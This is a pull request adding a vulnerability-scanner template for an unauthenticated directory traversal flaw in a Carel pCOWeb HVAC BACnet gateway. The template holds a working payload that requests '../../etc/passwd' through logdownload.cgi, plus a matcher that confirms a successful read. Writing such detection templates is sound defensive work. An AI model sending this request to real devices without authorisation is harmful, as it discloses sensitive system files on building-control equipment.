### PR TITLE
Create carel-bacnet-gateway-directory-traversal.yaml

### DIFF
--- a/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
+++ b/vulnerabilities/other/carel-bacnet-gateway-directory-traversal.yaml
@@ -1,0 +1,20 @@
+id: carel-bacnet-gateway-directory-traversal
+
+info:
+  name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Unauthenticated Directory Traversal
+  author: gy741
+  severity: medium
+  description: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
+  reference:
+    - https://www.zeroscience.mk/codes/carelpco_dir.txt
+  tags: carel,lfi,traversal,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added carel-bacnet-gateway-directory-traversal.yaml

```
The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
```

- References: https://www.zeroscience.mk/codes/carelpco_dir.txt

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO